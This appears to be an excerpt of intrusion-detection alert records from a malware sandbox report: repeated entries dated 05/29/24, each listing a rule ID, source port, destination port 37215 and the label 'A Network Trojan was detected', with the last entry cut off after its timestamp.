                Timestamp:05/29/24-15:16:13.508452
                SID:2835222
                Source Port:48714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.742721
                SID:2829579
                Source Port:37908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716227
                SID:2829579
                Source Port:55210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.230118
                SID:2829579
                Source Port:58940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418985
                SID:2829579
                Source Port:41898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.897720
                SID:2835222
                Source Port:57168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788364
                SID:2835222
                Source Port:39650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831110
                SID:2835222
                Source Port:37676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666112
                SID:2835222
                Source Port:34124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854356
                SID:2829579
                Source Port:37926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332347
                SID:2835222
                Source Port:54828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.645076
                SID:2835222
                Source Port:54282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166397
                SID:2829579
                Source Port:55830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848744
                SID:2835222
                Source Port:57950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.638844
                SID:2829579
                Source Port:44812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716130
                SID:2829579
                Source Port:44014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897610
                SID:2835222
                Source Port:57478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257140
                SID:2829579
                Source Port:57358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.737346
                SID:2835222
                Source Port:43548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532300
                SID:2835222
                Source Port:56700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.235403
                SID:2835222
                Source Port:57212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173228
                SID:2829579
                Source Port:45484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.390248
                SID:2835222
                Source Port:58984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467449
                SID:2829579
                Source Port:57922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640431
                SID:2835222
                Source Port:43392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618047
                SID:2829579
                Source Port:59234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781309
                SID:2835222
                Source Port:36024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685788
                SID:2829579
                Source Port:53954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899587
                SID:2829579
                Source Port:37884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386232
                SID:2829579
                Source Port:47094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421075
                SID:2829579
                Source Port:43514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811508
                SID:2835222
                Source Port:41220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364407
                SID:2829579
                Source Port:55188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644711
                SID:2829579
                Source Port:58866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764354
                SID:2829579
                Source Port:39836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.390300
                SID:2829579
                Source Port:59756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.585099
                SID:2829579
                Source Port:44320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610225
                SID:2835222
                Source Port:52328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.268499
                SID:2835222
                Source Port:33156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.570506
                SID:2835222
                Source Port:54024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583610
                SID:2835222
                Source Port:47002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434198
                SID:2829579
                Source Port:41078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163470
                SID:2835222
                Source Port:51330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722382
                SID:2829579
                Source Port:54788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624662
                SID:2835222
                Source Port:60408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321772
                SID:2829579
                Source Port:37358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864083
                SID:2835222
                Source Port:44614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.905228
                SID:2829579
                Source Port:37068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644985
                SID:2829579
                Source Port:51482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805829
                SID:2835222
                Source Port:58496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.656003
                SID:2829579
                Source Port:54068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429336
                SID:2829579
                Source Port:36350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.028707
                SID:2835222
                Source Port:50540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.813084
                SID:2829579
                Source Port:52084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.907901
                SID:2835222
                Source Port:37416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440882
                SID:2829579
                Source Port:49832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899181
                SID:2835222
                Source Port:42250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836501
                SID:2835222
                Source Port:56940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947694
                SID:2835222
                Source Port:56736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.944945
                SID:2835222
                Source Port:60022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725910
                SID:2835222
                Source Port:53290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624531
                SID:2835222
                Source Port:48822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666707
                SID:2835222
                Source Port:46268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863540
                SID:2835222
                Source Port:53654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870426
                SID:2835222
                Source Port:46976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.276639
                SID:2829579
                Source Port:58394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.524707
                SID:2835222
                Source Port:46092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983329
                SID:2829579
                Source Port:60242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227460
                SID:2829579
                Source Port:41746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969353
                SID:2835222
                Source Port:48000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.323062
                SID:2829579
                Source Port:53226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.101088
                SID:2829579
                Source Port:40466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584440
                SID:2835222
                Source Port:49758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321991
                SID:2829579
                Source Port:41788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711988
                SID:2835222
                Source Port:49328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628145
                SID:2829579
                Source Port:44560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155038
                SID:2829579
                Source Port:57836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868165
                SID:2829579
                Source Port:43180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506215
                SID:2835222
                Source Port:37896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212905
                SID:2829579
                Source Port:39764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948957
                SID:2835222
                Source Port:60880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860251
                SID:2829579
                Source Port:50572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597873
                SID:2835222
                Source Port:36126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573992
                SID:2829579
                Source Port:53160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140030
                SID:2829579
                Source Port:47932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225611
                SID:2835222
                Source Port:33050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626890
                SID:2829579
                Source Port:55740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853353
                SID:2829579
                Source Port:47006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.524568
                SID:2829579
                Source Port:51810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614795
                SID:2829579
                Source Port:58530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165208
                SID:2829579
                Source Port:48322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498512
                SID:2835222
                Source Port:47530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716209
                SID:2835222
                Source Port:55344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688913
                SID:2835222
                Source Port:34534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462576
                SID:2835222
                Source Port:54950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773272
                SID:2835222
                Source Port:53490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038151
                SID:2835222
                Source Port:37902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668762
                SID:2829579
                Source Port:48628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.391749
                SID:2829579
                Source Port:59674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786265
                SID:2829579
                Source Port:41226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945673
                SID:2829579
                Source Port:34734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091771
                SID:2829579
                Source Port:37286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435757
                SID:2835222
                Source Port:46400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942784
                SID:2829579
                Source Port:34246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586188
                SID:2835222
                Source Port:55126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.048272
                SID:2835222
                Source Port:43434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945813
                SID:2829579
                Source Port:52616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663852
                SID:2835222
                Source Port:41432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.636230
                SID:2835222
                Source Port:51218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.282476
                SID:2829579
                Source Port:55998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507423
                SID:2829579
                Source Port:42944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731100
                SID:2835222
                Source Port:53080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440380
                SID:2835222
                Source Port:56184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713299
                SID:2829579
                Source Port:46506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872473
                SID:2829579
                Source Port:44672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502823
                SID:2835222
                Source Port:52476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465994
                SID:2829579
                Source Port:48748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448918
                SID:2829579
                Source Port:33288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.904161
                SID:2835222
                Source Port:46756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893634
                SID:2835222
                Source Port:38308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.234117
                SID:2835222
                Source Port:51274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437410
                SID:2835222
                Source Port:45436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024738
                SID:2829579
                Source Port:48448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266687
                SID:2835222
                Source Port:37326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281038
                SID:2835222
                Source Port:50156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.802904
                SID:2829579
                Source Port:41308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935749
                SID:2829579
                Source Port:44466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652511
                SID:2829579
                Source Port:44542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946325
                SID:2835222
                Source Port:32916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025334
                SID:2835222
                Source Port:40750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.435910
                SID:2829579
                Source Port:43172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.612338
                SID:2835222
                Source Port:35696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993106
                SID:2829579
                Source Port:50790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926754
                SID:2829579
                Source Port:39214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843808
                SID:2829579
                Source Port:39126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361645
                SID:2835222
                Source Port:42222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597195
                SID:2829579
                Source Port:55952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583408
                SID:2835222
                Source Port:54288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667898
                SID:2835222
                Source Port:35060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868326
                SID:2835222
                Source Port:57144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.449004
                SID:2835222
                Source Port:50734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165802
                SID:2835222
                Source Port:34572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237708
                SID:2835222
                Source Port:37136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.073582
                SID:2835222
                Source Port:41194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263630
                SID:2835222
                Source Port:51668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.579294
                SID:2829579
                Source Port:44330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.516011
                SID:2835222
                Source Port:44490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712943
                SID:2829579
                Source Port:50316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501151
                SID:2835222
                Source Port:49372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331735
                SID:2835222
                Source Port:37518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371588
                SID:2835222
                Source Port:56606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319597
                SID:2835222
                Source Port:54230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162803
                SID:2835222
                Source Port:53050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964152
                SID:2829579
                Source Port:44002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223060
                SID:2835222
                Source Port:59666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885668
                SID:2835222
                Source Port:32904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731902
                SID:2835222
                Source Port:33546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.320561
                SID:2829579
                Source Port:33380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902056
                SID:2835222
                Source Port:53366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227490
                SID:2829579
                Source Port:47302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687929
                SID:2829579
                Source Port:40482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467259
                SID:2829579
                Source Port:40320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263806
                SID:2829579
                Source Port:54282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855883
                SID:2835222
                Source Port:33882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778288
                SID:2835222
                Source Port:54344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505736
                SID:2829579
                Source Port:56002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664534
                SID:2829579
                Source Port:36162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764994
                SID:2835222
                Source Port:60898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422289
                SID:2829579
                Source Port:47180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.962883
                SID:2829579
                Source Port:42092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.098670
                SID:2835222
                Source Port:52538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532333
                SID:2829579
                Source Port:36454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218189
                SID:2835222
                Source Port:42500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335068
                SID:2835222
                Source Port:44732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177472
                SID:2835222
                Source Port:40794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593643
                SID:2829579
                Source Port:53858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.105203
                SID:2829579
                Source Port:41916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990402
                SID:2835222
                Source Port:50708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652580
                SID:2835222
                Source Port:52184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.648340
                SID:2829579
                Source Port:58502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859519
                SID:2829579
                Source Port:39128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979593
                SID:2835222
                Source Port:42742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665839
                SID:2829579
                Source Port:42316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.900477
                SID:2835222
                Source Port:45432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687969
                SID:2835222
                Source Port:35720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672585
                SID:2829579
                Source Port:42356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701281
                SID:2829579
                Source Port:49758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282466
                SID:2829579
                Source Port:56672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511017
                SID:2835222
                Source Port:44560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893289
                SID:2835222
                Source Port:54526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381316
                SID:2829579
                Source Port:37202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941717
                SID:2835222
                Source Port:38998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.589351
                SID:2829579
                Source Port:41202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669598
                SID:2835222
                Source Port:48048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901153
                SID:2835222
                Source Port:40450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.369033
                SID:2829579
                Source Port:47750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508751
                SID:2835222
                Source Port:36016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024403
